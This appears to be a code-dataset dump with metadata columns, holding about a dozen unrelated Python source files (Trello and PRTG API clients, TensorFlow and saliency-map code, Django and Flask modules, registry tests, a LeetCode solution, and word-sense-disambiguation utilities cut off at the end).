max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
trellominer/api/trello.py | xnoder/trellominer | 0 | 6900 | <reponame>xnoder/trellominer
import os
import requests
from trellominer.config import yaml
class HTTP(object):
def __init__(self):
self.config = yaml.read(os.getenv("TRELLO_CONFIG", default=os.path.join(os.path.expanduser('~'), ".trellominer.yaml")))
self.api_url = os.getenv("TRELLO_URL", default=self.config['api']['url'])
self.api_key = os.getenv("TRELLO_API_KEY", default=self.config['api']['key'])
self.api_token = os.getenv("TRELLO_API_TOKEN", default=self.config['api']['token'])
self.organization = os.getenv("TRELLO_ORGANIZATION", default=self.config['api']['organization'])
self.output_file = os.getenv("TRELLO_OUTPUT_FILE", default=self.config['api']['output_file_name'])
class Trello(HTTP):
def __init__(self):
super().__init__()
def boards(self):
url = "{0}/organizations/{1}/boards?key={2}&token={3}".format(
self.api_url, self.organization, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def cards(self, board_id):
url = "{0}/boards/{1}/cards?fields=shortLink,name,desc,idList,due,dueComplete,closed,idMembers&members=true&member_fields=fullName&key={2}&token={3}".format(
self.api_url, board_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def lists(self, list_id):
url = "{0}/lists/{1}?key={2}&token={3}".format(self.api_url, list_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def checklists(self, card_id):
url = "{0}/cards/{1}/checklists?key={2}&token={3}".format(
self.api_url, card_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
| 2.375 | 2 |
alexnet_guided_bp_vanilla.py | wezteoh/face_perception_thru_backprop | 0 | 6901 | import numpy as np
import tensorflow as tf
import os
from scipy.io import savemat
from scipy.io import loadmat
from scipy.misc import imread
from scipy.misc import imsave
from alexnet_face_classifier import *
import matplotlib.pyplot as plt
plt.switch_backend('agg')
class backprop_graph:
def __init__(self, num_classes, nhid, cnn):
self.num_classes = num_classes
self.inputs = tf.placeholder(tf.float32, shape = [None, 227, 227, 3], name='input')
self.labels_1hot = tf.placeholder(tf.float32, shape=[None, self.num_classes])
self.cnn = cnn(self.inputs, None, self.num_classes)
self.cnn.preprocess()
self.cnn.convlayers()
self.cnn.fc_layers(transfer_learning=False, nhid=nhid)
def classifier_graph(self, temp=3.0):
self.probabilities = tf.nn.softmax(self.cnn.fc2/temp)
self.probability = tf.tensordot(self.probabilities, self.labels_1hot, axes=[[1],[1]])
self.log_probability = tf.log(self.probability)
def guided_backprop_graph(self):
self.grad_fc2 = tf.nn.relu(tf.gradients(self.probability, self.cnn.fc2)[0])
self.grad_fc1 = tf.nn.relu(tf.gradients(self.cnn.fc2, self.cnn.fc1, grad_ys=self.grad_fc2)[0])
self.grad_conv5 = tf.nn.relu(tf.gradients(self.cnn.fc1, self.cnn.conv5, grad_ys=self.grad_fc1)[0])
self.grad_conv4 = tf.nn.relu(tf.gradients(self.cnn.conv5, self.cnn.conv4, grad_ys=self.grad_conv5)[0])
self.grad_conv3 = tf.nn.relu(tf.gradients(self.cnn.conv4, self.cnn.conv3, grad_ys=self.grad_conv4)[0])
self.grad_conv2 = tf.nn.relu(tf.gradients(self.cnn.conv3, self.cnn.conv2, grad_ys=self.grad_conv3)[0])
self.grad_conv1 = tf.nn.relu(tf.gradients(self.cnn.conv2, self.cnn.conv1, grad_ys=self.grad_conv2)[0])
self.grad_image = tf.nn.relu(tf.gradients(self.cnn.conv1, self.inputs, grad_ys=self.grad_conv1)[0])
###
def guided_backprop(graph, image, one_hot, sess):
image = np.expand_dims(image, 0)
one_hot = np.expand_dims(one_hot, 0)
saliency_map = sess.run(graph.grad_image, feed_dict={graph.inputs:image, graph.labels_1hot:one_hot})[0]
scaling_adjustment = 1E-20
saliency_map_scaled = saliency_map/(np.max(saliency_map)+scaling_adjustment)
return saliency_map_scaled
| 2.421875 | 2 |
tests/test_sqlalchemy_registry.py | AferriDaniel/coaster | 48 | 6902 | <filename>tests/test_sqlalchemy_registry.py
"""Registry and RegistryMixin tests."""
from types import SimpleNamespace
import pytest
from coaster.db import db
from coaster.sqlalchemy import BaseMixin
from coaster.sqlalchemy.registry import Registry
# --- Fixtures -------------------------------------------------------------------------
@pytest.fixture()
def CallableRegistry(): # noqa: N802
"""Callable registry with a positional parameter."""
class CallableRegistry:
registry = Registry()
return CallableRegistry
@pytest.fixture()
def PropertyRegistry(): # noqa: N802
"""Registry with property and a positional parameter."""
class PropertyRegistry:
registry = Registry(property=True)
return PropertyRegistry
@pytest.fixture()
def CachedPropertyRegistry(): # noqa: N802
"""Registry with cached property and a positional parameter."""
class CachedPropertyRegistry:
registry = Registry(cached_property=True)
return CachedPropertyRegistry
@pytest.fixture()
def CallableParamRegistry(): # noqa: N802
"""Callable registry with a keyword parameter."""
class CallableParamRegistry:
registry = Registry('kwparam')
return CallableParamRegistry
@pytest.fixture()
def PropertyParamRegistry(): # noqa: N802
"""Registry with property and a keyword parameter."""
class PropertyParamRegistry:
registry = Registry('kwparam', property=True)
return PropertyParamRegistry
@pytest.fixture()
def CachedPropertyParamRegistry(): # noqa: N802
"""Registry with cached property and a keyword parameter."""
class CachedPropertyParamRegistry:
registry = Registry('kwparam', cached_property=True)
return CachedPropertyParamRegistry
@pytest.fixture()
def all_registry_hosts(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""All test registries as a list."""
return [
CallableRegistry,
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
]
@pytest.fixture(scope='module')
def registry_member():
"""Test registry member function."""
def member(pos=None, kwparam=None):
pass
return member
@pytest.fixture(scope='session')
def registrymixin_models():
"""Fixtures for RegistryMixin tests."""
# We have two sample models and two registered items to test that
# the registry is unique to each model and is not a global registry
# in the base RegistryMixin class.
# Sample model 1
class RegistryTest1(BaseMixin, db.Model):
"""Registry test model 1."""
__tablename__ = 'registry_test1'
# Sample model 2
class RegistryTest2(BaseMixin, db.Model):
"""Registry test model 2."""
__tablename__ = 'registry_test2'
# Sample registered item (form or view) 1
class RegisteredItem1:
"""Registered item 1."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 2
@RegistryTest2.views('test')
class RegisteredItem2:
"""Registered item 2."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 3
@RegistryTest1.features('is1')
@RegistryTest2.features()
def is1(obj):
"""Assert object is instance of RegistryTest1."""
return isinstance(obj, RegistryTest1)
RegistryTest1.views.test = RegisteredItem1
return SimpleNamespace(**locals())
# --- Tests ----------------------------------------------------------------------------
# --- Creating a registry
def test_registry_set_name():
"""Registry's __set_name__ gets called."""
# Registry has no name unless added to a class
assert Registry()._name is None
class RegistryUser:
reg1 = Registry()
reg2 = Registry()
assert RegistryUser.reg1._name == 'reg1'
assert RegistryUser.reg2._name == 'reg2'
def test_registry_reuse_error():
"""Registries cannot be reused under different names."""
# Registry raises TypeError from __set_name__, but Python recasts as RuntimeError
with pytest.raises(RuntimeError):
class RegistryUser:
a = b = Registry()
def test_registry_reuse_okay():
"""Registries be reused with the same name under different hosts."""
reusable = Registry()
assert reusable._name is None
class HostA:
registry = reusable
assert HostA.registry._name == 'registry'
class HostB:
registry = reusable
assert HostB.registry._name == 'registry'
assert HostA.registry is HostB.registry
assert HostA.registry is reusable
def test_registry_param_type():
"""Registry's param must be string or None."""
r = Registry()
assert r._param is None
r = Registry('')
assert r._param is None
r = Registry(1)
assert r._param == '1'
r = Registry('obj')
assert r._param == 'obj'
r = Registry(param='foo')
assert r._param == 'foo'
def test_registry_property_cached_property():
"""A registry can have property or cached_property set, but not both."""
r = Registry()
assert r._default_property is False
assert r._default_cached_property is False
r = Registry(property=True)
assert r._default_property is True
assert r._default_cached_property is False
r = Registry(cached_property=True)
assert r._default_property is False
assert r._default_cached_property is True
with pytest.raises(TypeError):
Registry(property=True, cached_property=True)
# --- Populating a registry
def test_add_to_registry(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added to registries and accessed as per registry settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member(1) == (1, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_property_cache_mismatch(
PropertyRegistry, CachedPropertyRegistry # noqa: N803
):
"""A registry's default setting must be explicitly turned off if conflicting."""
with pytest.raises(TypeError):
@PropertyRegistry.registry(cached_property=True)
def member1(pos=None, kwparam=None):
return (pos, kwparam)
with pytest.raises(TypeError):
@CachedPropertyRegistry.registry(property=True)
def member2(pos=None, kwparam=None):
return (pos, kwparam)
@PropertyRegistry.registry(cached_property=True, property=False)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
def test_add_to_registry_host(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a function, overriding default settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry(property=False)
@CachedPropertyRegistry.registry(cached_property=False)
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry(property=False)
@CachedPropertyParamRegistry.registry(cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member(2) == (property_host, 2)
assert cached_property_host.registry.member(3) == (cached_property_host, 3)
assert callable_param_host.registry.member(4) == (4, callable_param_host)
assert property_param_host.registry.member(5) == (5, property_param_host)
assert cached_property_param_host.registry.member(6) == (
6,
cached_property_param_host,
)
def test_add_to_registry_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_cached_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_custom_name(all_registry_hosts, registry_member):
"""Members can be added to a registry with a custom name."""
assert registry_member.__name__ == 'member'
for host in all_registry_hosts:
# Mock decorator call
host.registry('custom')(registry_member)
# This adds the member under the custom name
assert host.registry.custom is registry_member
# The default name of the function is not present...
with pytest.raises(AttributeError):
assert host.registry.member is registry_member
# ... but can be added
host.registry()(registry_member)
assert host.registry.member is registry_member
def test_add_to_registry_underscore(all_registry_hosts, registry_member):
"""Registry member names cannot start with an underscore."""
for host in all_registry_hosts:
with pytest.raises(ValueError):
host.registry('_new_member')(registry_member)
def test_add_to_registry_dupe(all_registry_hosts, registry_member):
"""Registry member names cannot be duplicates of an existing name."""
for host in all_registry_hosts:
host.registry()(registry_member)
with pytest.raises(ValueError):
host.registry()(registry_member)
host.registry('custom')(registry_member)
with pytest.raises(ValueError):
host.registry('custom')(registry_member)
def test_cached_properties_are_cached(
PropertyRegistry, # noqa: N803
CachedPropertyRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""Cached properties are truly cached."""
# Register registry member
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return [pos, kwparam] # Lists are different each call
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
# The properties and cached properties work
assert property_host.registry.member == [property_host, None]
assert cached_property_host.registry.member == [cached_property_host, None]
assert property_param_host.registry.member == [None, property_param_host]
assert cached_property_param_host.registry.member == [
None,
cached_property_param_host,
]
# The properties and cached properties return equal values on each access
assert property_host.registry.member == property_host.registry.member
assert cached_property_host.registry.member == cached_property_host.registry.member
assert property_param_host.registry.member == property_param_host.registry.member
assert (
cached_property_param_host.registry.member
== cached_property_param_host.registry.member
)
# Only the cached properties return the same value every time
assert property_host.registry.member is not property_host.registry.member
assert cached_property_host.registry.member is cached_property_host.registry.member
assert (
property_param_host.registry.member is not property_param_host.registry.member
)
assert (
cached_property_param_host.registry.member
is cached_property_param_host.registry.member
)
# TODO:
# test_registry_member_cannot_be_called_clear_cache
# test_multiple_positional_and_keyword_arguments
# test_registry_iter
# test_registry_members_must_be_callable
# test_add_by_directly_sticking_in
# test_instance_registry_is_cached
# test_clear_cache_for
# test_clear_cache
# test_registry_mixin_config
# test_registry_mixin_subclasses
# --- RegistryMixin tests --------------------------------------------------------------
def test_access_item_from_class(registrymixin_models):
"""Registered items are available from the model class."""
assert (
registrymixin_models.RegistryTest1.views.test
is registrymixin_models.RegisteredItem1
)
assert (
registrymixin_models.RegistryTest2.views.test
is registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest1.views.test
is not registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest2.views.test
is not registrymixin_models.RegisteredItem1
)
assert registrymixin_models.RegistryTest1.features.is1 is registrymixin_models.is1
assert registrymixin_models.RegistryTest2.features.is1 is registrymixin_models.is1
def test_access_item_class_from_instance(registrymixin_models):
"""Registered items are available from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
# When accessed from the instance, we get a partial that resembles
# the wrapped item, but is not the item itself.
assert r1.views.test is not registrymixin_models.RegisteredItem1
assert r1.views.test.func is registrymixin_models.RegisteredItem1
assert r2.views.test is not registrymixin_models.RegisteredItem2
assert r2.views.test.func is registrymixin_models.RegisteredItem2
assert r1.features.is1 is not registrymixin_models.is1
assert r1.features.is1.func is registrymixin_models.is1
assert r2.features.is1 is not registrymixin_models.is1
assert r2.features.is1.func is registrymixin_models.is1
def test_access_item_instance_from_instance(registrymixin_models):
"""Registered items can be instantiated from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
i1 = r1.views.test()
i2 = r2.views.test()
assert isinstance(i1, registrymixin_models.RegisteredItem1)
assert isinstance(i2, registrymixin_models.RegisteredItem2)
assert not isinstance(i1, registrymixin_models.RegisteredItem2)
assert not isinstance(i2, registrymixin_models.RegisteredItem1)
assert i1.obj is r1
assert i2.obj is r2
assert i1.obj is not r2
assert i2.obj is not r1
def test_features(registrymixin_models):
"""The features registry can be used for feature tests."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
assert r1.features.is1() is True
assert r2.features.is1() is False
| 2.359375 | 2 |
home/migrations/0010_auto_20180206_1625.py | RomanMahar/personalsite | 0 | 6903 | <reponame>RomanMahar/personalsite
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-02-06 16:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('home', '0009_remove_homepagesection_sectiontitle'),
]
operations = [
migrations.CreateModel(
name='SnippetClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=255)),
('page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='snippy', to='wagtailcore.Page')),
],
),
migrations.AlterField(
model_name='homepagesection',
name='sectionClassName',
field=models.SlugField(default='homepage-section', help_text='no spaces', max_length=100),
),
migrations.AddField(
model_name='homepagesection',
name='advert',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='home.SnippetClass'),
),
]
| 1.6875 | 2 |
nesta/packages/misc_utils/tests/test_guess_sql_type.py | anniyanvr/nesta | 13 | 6904 | import pytest
from nesta.packages.misc_utils.guess_sql_type import guess_sql_type
@pytest.fixture
def int_data():
return [1,2,4,False]
@pytest.fixture
def text_data():
return ['a', True, 2,
('A very long sentence A very long sentence A '
'very long sentence A very long sentence'), 'd']
@pytest.fixture
def float_data():
return [1,2.3,True,None]
@pytest.fixture
def bool_data():
return [True,False,None]
def test_guess_sql_type_int(int_data):
assert guess_sql_type(int_data) == 'INTEGER'
def test_guess_sql_type_float(float_data):
assert guess_sql_type(float_data) == 'FLOAT'
def test_guess_sql_type_bool(bool_data):
assert guess_sql_type(bool_data) == 'BOOLEAN'
def test_guess_sql_type_str(text_data):
assert guess_sql_type(text_data, text_len=10) == 'TEXT'
assert guess_sql_type(text_data, text_len=100).startswith('VARCHAR(')
| 2.4375 | 2 |
api/controller/activity.py | DXCChina/pms | 27 | 6905 | # -*- coding: utf-8 -*-
'''活动管理接口'''
from flask import request
from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User
from model.role import identity
from flask_jwt_extended import (fresh_jwt_required)
def demand_activity_add(activity_id, data):
'''添加活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if not demand.activityId:
demand.activityId = activity_id
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_del(activity_id, data):
'''删除活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.activityId = None
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
def demand_activity_done(activity_id, data):
'''更新活动需求'''
for demand_id in data:
demand = Demand.get(Demand.id == demand_id)
if demand.activityId == activity_id:
demand.status = 1
# Demand.update(activityId=activity_id).where(Demand.id == demand_id).execute()
demand.save()
@fresh_jwt_required
@identity.check_permission("create", 'task')
def activity_add():
'''创建项目活动'''
data = request.json
if 'memberId' in data and data['memberId']:
data['status'] = 'dev-ing'
with database.atomic():
activity_id = ActivityBase.create(**data).id
if 'memberId' in data and data['memberId']:
for member_id in data['memberId']:
role = ProjectMember.get(
ProjectMember.projectId == data['projectId'],
ProjectMember.memberId == member_id).role
ActivityMember.create(**{
'activityId': activity_id,
'memberId': member_id,
'role': role
})
demand_activity_add(activity_id, data['demand'])
return {"msg": 'ok'}
@fresh_jwt_required
@identity.check_permission("update", 'task')
def activity_update():
'''更新项目活动'''
data = request.json
activity_id = data.pop('activityId')
with database.atomic():
if 'del_memberId' in data:
for member_id in data.pop('del_memberId'):
ActivityMember.delete().where(
(ActivityMember.activityId == activity_id) &
(ActivityMember.memberId == member_id)).execute()
if 'memberId' in data:
if not 'status' in data or not data['status']:
data['status'] = 'dev-ing'
for member_id in data.pop('memberId'):
ActivityMember.get_or_create(
activityId=activity_id,
memberId=member_id,
role=ProjectMember.get(
(ProjectMember.projectId == data['projectId'])
& (ProjectMember.memberId == member_id)).role)
if 'done_demand' in data:
demand_activity_done(activity_id, data.pop('done_demand'))
if 'demand' in data:
demand_activity_add(activity_id, data.pop('demand'))
if 'del_demand' in data:
demand_activity_del(activity_id, data.pop('del_demand'))
Activity.update(**data).where(Activity.id == activity_id).execute()
return {"msg": 'ok'}
@fresh_jwt_required
def activity_detail(activity_id):
'''查询活动详情
GET /api/activity/<int:activity_id>
'''
activity = Activity.findOne(Activity.id == activity_id)
activity['member'] = list(
ActivityMember.find(ActivityMember.role, User.username,
User.email, User.id).join(User)
.where(ActivityMember.activityId == activity_id))
activity['demand'] = list(
Demand.find().where(Demand.activityId == activity_id))
return activity
@fresh_jwt_required
def project_user(project_id):
'''查询项目成员'''
return {
"data":
list(
ProjectMember.find(
ProjectMember.role,
User).join(User).where(ProjectMember.projectId == project_id))
}
| 2.4375 | 2 |
math/9. Palindrome number.py | Rage-ops/Leetcode-Solutions | 1 | 6906 | <filename>math/9. Palindrome number.py<gh_stars>1-10
# Easy
# https://leetcode.com/problems/palindrome-number/
# Time Complexity: O(log(x) to base 10)
# Space Complexity: O(1)
class Solution:
def isPalindrome(self, x: int) -> bool:
temp = x
rev = 0
while temp > 0:
rev = rev * 10 + temp % 10
temp //= 10
return rev == x | 3.65625 | 4 |
panoramisk/__init__.py | Eyepea/panoramisk | 0 | 6907 | from .manager import Manager # NOQA
from .call_manager import CallManager # NOQA
from . import fast_agi # NOQA
| 1.085938 | 1 |
prtg/client.py | kevinschoon/prtg-py | 0 | 6908 | <filename>prtg/client.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Python library for Paessler's PRTG (http://www.paessler.com/)
"""
import logging
import xml.etree.ElementTree as Et
from urllib import request
from prtg.cache import Cache
from prtg.models import Sensor, Device, Status, PrtgObject
from prtg.exceptions import BadTarget, UnknownResponse
class Connection(object):
"""
PRTG Connection Object
"""
def __init__(self):
self.response = list()
@staticmethod
def _encode_response(response, tag):
out = list()
if any([tag == 'devices', tag =='sensors']):
for item in response.findall('item'):
i = dict()
for attrib in item:
i[attrib.tag] = attrib.text
if tag == 'devices':
out.append(Device(**i))
if tag == 'sensors':
out.append(Sensor(**i))
if tag == 'status':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(Status(**i))
if tag == 'prtg':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(PrtgObject(**i))
return out
def _process_response(self, response, expect_return=True):
"""
Process the response from the server.
"""
if expect_return:
try:
resp = Et.fromstring(response.read().decode('utf-8'))
except Et.ParseError as e:
raise UnknownResponse(e)
try:
ended = resp.attrib['listend'] # Catch KeyError and return finished
except KeyError:
ended = 1
return self._encode_response(resp, resp.tag), ended
def _build_request(self, query):
"""
Build the HTTP request.
"""
req, method = str(query), query.method
logging.debug('REQUEST: target={} method={}'.format(req, method))
return request.Request(url=req, method=method)
def get_request(self, query):
"""
Make a single HTTP request
"""
req = self._build_request(query)
logging.info('Making request: {}'.format(query))
resp, ended = self._process_response(request.urlopen(req))
self.response += resp
if not int(ended): # Recursively request until PRTG indicates "listend"
query.increment()
self.get_request(query)
class Client(object):
def __init__(self, endpoint, username, password):
self.endpoint = endpoint
self.username = username
self.password = password
self.cache = Cache()
@staticmethod
def query(query):
conn = Connection()
conn.get_request(query)
return conn.response
"""
def refresh(self, query):
logging.info('Refreshing content: {}'.format(content))
devices = Query(target='table', endpoint=self.endpoint, username=self.username, password=<PASSWORD>, content=content, counter=content)
self.connection.get_paginated_request(devices)
self.cache.write_content(devices.response)
def update(self, content, attribute, value, replace=False):
for index, obj in enumerate(content):
logging.debug('Updating object: {} with {}={}'.format(obj, attribute, value))
if attribute == 'tags':
tags = value.split(',')
if replace:
obj.tags = value.split(',')
else:
obj.tags += [x for x in tags if x not in obj.tags]
content[index] = obj
self.cache.write_content(content, force=True)
def content(self, content_name, parents=False, regex=None, attribute=None):
response = list()
for resp in self.cache.get_content(content_name):
if not all([regex, attribute]):
response.append(resp)
else:
if RegexMatch(resp, expression=regex, attribute=attribute):
response.append(resp)
if all([content_name == 'sensors', parents is True]):
logging.info('Searching for parents.. this may take a while')
p = list()
ids = set()
for index, child in enumerate(response):
parent = self.cache.get_object(str(child.parentid)) # Parent device.
if parent:
ids.add(str(parent.objid)) # Lookup unique parent ids.
else:
logging.warning('Unable to find sensor parent')
for parent in ids:
p.append(self.cache.get_object(parent))
response = p
return response
"""
| 2.671875 | 3 |
template/misc.py | da-h/tf-boilerplate | 0 | 6909 | import tensorflow as tf
from tensorflow.python.training.session_run_hook import SessionRunArgs
# Define data loaders #####################################
# See https://gist.github.com/peterroelants/9956ec93a07ca4e9ba5bc415b014bcca
class IteratorInitializerHook(tf.train.SessionRunHook):
"""Hook to initialise data iterator after Session is created."""
def __init__(self, func=None):
super(IteratorInitializerHook, self).__init__()
self.iterator_initializer_func = func
def after_create_session(self, session, coord):
"""Initialise the iterator after the session has been created."""
self.iterator_initializer_func(session)
# redefine summarysaverhook (for more accurate saving)
class CustomSummarySaverHook(tf.train.SummarySaverHook):
"""Saves summaries every N steps."""
def __init__(self,save_steps,*args,**kwargs):
super(CustomSummarySaverHook, self).__init__(*args,save_steps=save_steps,**kwargs)
def begin(self):
super().begin()
self._timer.reset()
self._iter_count = 0
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = ((self._iter_count + 1) % self.save_steps == 0)
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._iter_count += 1
class OneTimeSummarySaverHook(tf.train.SummarySaverHook):
"""One-Time SummarySaver
Saves summaries every N steps.
E.g. can be used for saving the source code as text.
"""
def __init__(self, output_dir=None, summary_writer=None, scaffold=None, summary_op=None):
self._summary_op = summary_op
self._summary_writer = summary_writer
self._output_dir = output_dir
self._scaffold = scaffold
class emptytimer():
def update_last_triggered_step(*args,**kwargs):
pass
self._timer = emptytimer()
def begin(self):
super().begin()
self._done = False
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = not self._done
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._done = True
def ExperimentTemplate() -> str:
"""A template with Markdown syntax.
:return: str with Markdown template
"""
return """
Experiment
==========
Any [markdown code](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) can be used to describe this experiment.
For instance, you can find the automatically generated used settings of this run below.
Current Settings
----------------
| Argument | Value |
| -------- | ----- |
"""
| 2.71875 | 3 |
pyunitwizard/_private_tools/parsers.py | uibcdf/pyunitwizard | 0 | 6910 | <filename>pyunitwizard/_private_tools/parsers.py
parsers = ['openmm.unit', 'pint', 'unyt']
def digest_parser(parser: str) -> str:
""" Check if parser is correct."""
if parser is not None:
if parser.lower() in parsers:
return parser.lower()
else:
raise ValueError
else:
from pyunitwizard.kernel import default_parser
return default_parser
| 2.71875 | 3 |
metric_wsd/utils/data_utils.py | bartonlin/MWSD | 4 | 6911 | '''
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
Code taken from: https://github.com/facebookresearch/wsd-biencoders/blob/master/wsd_models/util.py
'''
import os
import re
import torch
import subprocess
from transformers import *
import random
pos_converter = {'NOUN':'n', 'PROPN':'n', 'VERB':'v', 'AUX':'v', 'ADJ':'a', 'ADV':'r'}
def generate_key(lemma, pos):
if pos in pos_converter.keys():
pos = pos_converter[pos]
key = '{}+{}'.format(lemma, pos)
return key
def load_pretrained_model(name):
if name == 'roberta-base':
model = RobertaModel.from_pretrained('roberta-base')
hdim = 768
elif name == 'roberta-large':
model = RobertaModel.from_pretrained('roberta-large')
hdim = 1024
elif name == 'bert-large':
model = BertModel.from_pretrained('bert-large-uncased')
hdim = 1024
else: #bert base
model = BertModel.from_pretrained('bert-base-uncased')
hdim = 768
return model, hdim
def load_tokenizer(name):
if name == 'roberta-base':
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
elif name == 'roberta-large':
tokenizer = RobertaTokenizer.from_pretrained('roberta-large')
elif name == 'bert-large':
tokenizer = BertTokenizer.from_pretrained('bert-large-uncased')
else: #bert base
